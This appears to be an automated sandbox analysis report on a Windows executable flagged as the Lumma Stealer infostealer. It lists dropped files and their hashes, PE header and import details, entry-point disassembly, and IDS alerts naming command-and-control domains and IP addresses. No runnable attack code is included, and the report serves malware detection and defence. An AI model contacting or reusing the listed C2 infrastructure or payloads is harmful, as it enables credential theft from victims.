                                                                                                                                                                                                                                                                  SSDEEP:192:Tr5cicXqOjThpOx1BxRWcQ3X6Xq22VFYCiNVkfPhUK2VBrfAfm:mDjmTBxRWn3XRk38fJV2VB7Mm
                                                                                                                                                                                                                                                                  MD5:74151FA95799E7EF6D68B97C6D6EDE80
                                                                                                                                                                                                                                                                  SHA1:A6F2A3BA5174A96553A71DB48B551E3E64F5F624
                                                                                                                                                                                                                                                                  SHA-256:74A6A714299EF16FA8A1DB5A95AB99B630647137F9E93CEBD1CC7AC0D6A1A4C1
                                                                                                                                                                                                                                                                  SHA-512:8211FDDEA43AFB0D0EA3D028D8C30EB7A6D16788E9A3F5C9DF3E7C429106DD86DFDA4A076D27005DA0EC808885283327CB846B9826F469B1B6685F82A9759AF6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:MDMP..a..... .......3.]g............4...............H...........<...........|-..........`.......8...........T...........8A..vs......................................................................................................eJ......t ......GenuineIntel............T...........%.]g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER25D3.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):8286
                                                                                                                                                                                                                                                                  Entropy (8bit):3.6975879314903284
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJPO6V6YaH6SgmfOrs+Y0pDy89bjhsfEhm:R6lXJG6V6YC6SgmfDujafP
                                                                                                                                                                                                                                                                  MD5:7D502E508676EFD9ED3F6ACA8B75469D
                                                                                                                                                                                                                                                                  SHA1:9648B471F5713EDC795808CB42931511021834DF
                                                                                                                                                                                                                                                                  SHA-256:56C191994670D2549893FFAE46605BF4B602A7F5A68177CF0AD3B684227E090D
                                                                                                                                                                                                                                                                  SHA-512:F0162CE7954196E337F417E28D3A767919BAB742DE95B6C3C8092F0D152875B0C87FD0B9AA853E4C8C7BDC3A03933C5B3BAD9DEBED00DBCA7CC69DBAAEDCE82F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.4.4.<./.P.i.

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2603.tmp.xml

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4565
                                                                                                                                                                                                                                                                  Entropy (8bit):4.4439637104311425
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs6Jg77aI9cHWpW8VY2Ym8M4J2CH9TXeFY+q8frrNCkcX6QzQ2dd:uIjfII7K27VmJNGcX6QzQ2dd
                                                                                                                                                                                                                                                                  MD5:349FDD6E1B27929EF886B0BA2A6B1FDD
                                                                                                                                                                                                                                                                  SHA1:D58FBC22C711D064A65B14BAC1F7C5D9750DF111
                                                                                                                                                                                                                                                                  SHA-256:A4EEC856517F4868F5324B1B8C5830AD05072AC6F6E72DF48F9D84636F98A0B6
                                                                                                                                                                                                                                                                  SHA-512:F5AF87A1B423F1A0B4D798CB902E1F78A19F70EE3F214792C47CAB9E6235DE9211BEA4728214251322F88652ECCC9A6FD3E70554F011054246F6E0276B6C14CF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="630979" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\rHrG691f7q.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):361984
                                                                                                                                                                                                                                                                  Entropy (8bit):6.633746849794654
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
                                                                                                                                                                                                                                                                  MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                                  SHA1:4A2095690BA8F1325DD10167318728447D12058A
                                                                                                                                                                                                                                                                  SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                                                                                                                                                                                                                                                                  SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                  • Filename: TN78WX7nJU.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: XIaCqh1vRm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1A68.tmp.exe

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\rHrG691f7q.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):361984
                                                                                                                                                                                                                                                                  Entropy (8bit):6.633746849794654
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
                                                                                                                                                                                                                                                                  MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                                  SHA1:4A2095690BA8F1325DD10167318728447D12058A
                                                                                                                                                                                                                                                                  SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                                                                                                                                                                                                                                                                  SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                  • Filename: TN78WX7nJU.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: XIaCqh1vRm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                                  Entropy (8bit):4.468584472694627
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:BzZfpi6ceLPx9skLmb0flZWSP3aJG8nAgeiJRMMhA2zX4WABluuNBjDH5S:ZZHtlZWOKnMM6bFpnj4
                                                                                                                                                                                                                                                                  MD5:AD2B3E929D6903DC7F23D646E35AD6D4
                                                                                                                                                                                                                                                                  SHA1:3A2E48437D4AB245494A03D1984FD954A113E5AB
                                                                                                                                                                                                                                                                  SHA-256:17D04DF93CAF4D74369CA51318EB06655B77C8CDFFDDACF5FC6C3EF880A1DDF5
                                                                                                                                                                                                                                                                  SHA-512:51CD0749F7F3E226B346A72537873766051CE032946EFF2A71FB8E87F35EFD876BB0864F74C86A3E386FBAE541408FC89CDF9243CB293777D481A112FCDA1002
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..Jf*N..............................................................................................................................................................................................................................................................................................................................................*,\R........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Entropy (8bit):6.965102901294979
                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                  File name:rHrG691f7q.exe
                                                                                                                                                                                                                                                                  File size:429'056 bytes
                                                                                                                                                                                                                                                                  MD5:f610013d7c84f779afa017218890e7ce
                                                                                                                                                                                                                                                                  SHA1:b804e0105708cc52b09137bfd2b76c5515577e3a
                                                                                                                                                                                                                                                                  SHA256:69b0f2ca7e883e86bc905febffef4e074ef837451faa9e88dbba74fda64319a1
                                                                                                                                                                                                                                                                  SHA512:50f16d2dcf69221f2b91a66312d7363e7a8ac55da7791bf7549dddb2271a5a3a0c43bdc29e629cfebc2a306b0a310fb9be2eeb5612dda020328b92699c6f05bb
                                                                                                                                                                                                                                                                  SSDEEP:6144:aa23ghN4DGiskOK96qetIDoCC9aYHYZemInIeR0wWku:aa2ghWGisu96qe3bHYZemiR0w
                                                                                                                                                                                                                                                                  TLSH:7B94D013A2F1B921E6B34F325D3DF7D86A2FF5624E34662E22545A5F09702A1C673B03
                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L...\A.e...........

                                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                                  Icon Hash:46c7c30b0f4e0d19

                                                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Entrypoint:0x40185c
                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                  Time Stamp:0x65D1415C [Sat Feb 17 23:29:32 2024 UTC]
                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                  Import Hash:28289f2f7e0a533d999708a3ae088e0b

                                                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                  call 00007EFF39096896h
                                                                                                                                                                                                                                                                  jmp 00007EFF39092F1Dh
                                                                                                                                                                                                                                                                  mov edi, edi
                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                                  sub esp, 00000328h
                                                                                                                                                                                                                                                                  mov dword ptr [00456C18h], eax
                                                                                                                                                                                                                                                                  mov dword ptr [00456C14h], ecx
                                                                                                                                                                                                                                                                  mov dword ptr [00456C10h], edx
                                                                                                                                                                                                                                                                  mov dword ptr [00456C0Ch], ebx
                                                                                                                                                                                                                                                                  mov dword ptr [00456C08h], esi
                                                                                                                                                                                                                                                                  mov dword ptr [00456C04h], edi
                                                                                                                                                                                                                                                                  mov word ptr [00456C30h], ss
                                                                                                                                                                                                                                                                  mov word ptr [00456C24h], cs
                                                                                                                                                                                                                                                                  mov word ptr [00456C00h], ds
                                                                                                                                                                                                                                                                  mov word ptr [00456BFCh], es
                                                                                                                                                                                                                                                                  mov word ptr [00456BF8h], fs
                                                                                                                                                                                                                                                                  mov word ptr [00456BF4h], gs
                                                                                                                                                                                                                                                                  pushfd
                                                                                                                                                                                                                                                                  pop dword ptr [00456C28h]
                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                                  mov dword ptr [00456C1Ch], eax
                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                                  mov dword ptr [00456C20h], eax
                                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                  mov dword ptr [00456C2Ch], eax
                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                                  mov dword ptr [00456B68h], 00010001h
                                                                                                                                                                                                                                                                  mov eax, dword ptr [00456C20h]
                                                                                                                                                                                                                                                                  mov dword ptr [00456B1Ch], eax
                                                                                                                                                                                                                                                                  mov dword ptr [00456B10h], C0000409h
                                                                                                                                                                                                                                                                  mov dword ptr [00456B14h], 00000001h
                                                                                                                                                                                                                                                                  mov eax, dword ptr [00454004h]
                                                                                                                                                                                                                                                                  mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                                  mov eax, dword ptr [00454008h]
                                                                                                                                                                                                                                                                  mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                                  call dword ptr [000000C0h]

                                                                                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                                  • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                                  • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                                  • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                                  • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5296c0x50.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x4310000xf430.rsrc
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x524d00x40.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x510000x188.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                  .text0x10000x4fdfc0x4fe00cc39435343f3039c24ae361aa0082cb9False0.8446730731611893data7.548735116985004IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .rdata0x510000x224c0x240078a11ed87aa892a31015617ab8411c9bFalse0.3493923611111111data5.344230957319916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .data0x540000x3dc49c0x700081a00408d148aa5aa30169c9af2fa1eaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  .rsrc0x4310000xf4300xf6002b3cb98562ca0d71d9f1af978d20c708False0.47125889227642276data5.03387043119155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                  RT_CURSOR0x43c0c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                                                                                                                                                                                                                  RT_ICON0x4316100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.3296908315565032
                                                                                                                                                                                                                                                                  RT_ICON0x4324b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.3935018050541516
                                                                                                                                                                                                                                                                  RT_ICON0x432d600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.3945852534562212
                                                                                                                                                                                                                                                                  RT_ICON0x4334280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.4031791907514451
                                                                                                                                                                                                                                                                  RT_ICON0x4339900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkmenTurkmenistan0.22074688796680497
                                                                                                                                                                                                                                                                  RT_ICON0x435f380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkmenTurkmenistan0.24835834896810507
                                                                                                                                                                                                                                                                  RT_ICON0x436fe00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkmenTurkmenistan0.2778688524590164
                                                                                                                                                                                                                                                                  RT_ICON0x4379680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkmenTurkmenistan0.30319148936170215
                                                                                                                                                                                                                                                                  RT_ICON0x437e480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.8136993603411514
                                                                                                                                                                                                                                                                  RT_ICON0x438cf00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.8298736462093863
                                                                                                                                                                                                                                                                  RT_ICON0x4395980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.7920506912442397
                                                                                                                                                                                                                                                                  RT_ICON0x439c600x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.755057803468208
                                                                                                                                                                                                                                                                  RT_ICON0x43a1c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.8339587242026266
                                                                                                                                                                                                                                                                  RT_ICON0x43b2700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.8426229508196721
                                                                                                                                                                                                                                                                  RT_ICON0x43bbf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8608156028368794
                                                                                                                                                                                                                                                                  RT_STRING0x43d1400x47adata0.4424083769633508
                                                                                                                                                                                                                                                                  RT_STRING0x43d5c00xc8data0.57
                                                                                                                                                                                                                                                                  RT_STRING0x43d6880x6a8data0.43133802816901406
                                                                                                                                                                                                                                                                  RT_STRING0x43dd300x600data0.4303385416666667
                                                                                                                                                                                                                                                                  RT_STRING0x43e3300x802data0.41804878048780486
                                                                                                                                                                                                                                                                  RT_STRING0x43eb380x75edata0.4268292682926829
                                                                                                                                                                                                                                                                  RT_STRING0x43f2980x56cdata0.4546109510086455
                                                                                                                                                                                                                                                                  RT_STRING0x43f8080x6cedata0.4293915040183697
                                                                                                                                                                                                                                                                  RT_STRING0x43fed80x556data0.44363103953147875
                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x43cf700x14data1.25
                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x43c0600x68dataTurkmenTurkmenistan0.7115384615384616
                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x437dd00x76dataTurkmenTurkmenistan0.6610169491525424
                                                                                                                                                                                                                                                                  RT_VERSION0x43cf880x1b4data0.5688073394495413

                                                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                  KERNEL32.dllSetDefaultCommConfigA, GetNumaProcessorNode, DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, SetFileAttributesA, UnregisterWait, ResetEvent, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, FoldStringW, GetModuleFileNameA, GetModuleHandleA, SetLocaleInfoW, UpdateResourceW, OpenFileMappingW, WriteConsoleOutputAttribute, WriteProcessMemory, BuildCommDCBW, GetCommandLineW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, MultiByteToWideChar, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, HeapSize, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
                                                                                                                                                                                                                                                                  USER32.dllGetProcessDefaultLayout
                                                                                                                                                                                                                                                                  GDI32.dllGetBitmapBits

                                                                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                  TurkmenTurkmenistan

                                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                  2024-12-14T14:16:18.900335+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649722104.21.56.70443TCP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:20.657689+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649726176.113.115.1980TCP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:25.760174+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.6638591.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:25.984571+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.6643531.1.1.153UDP
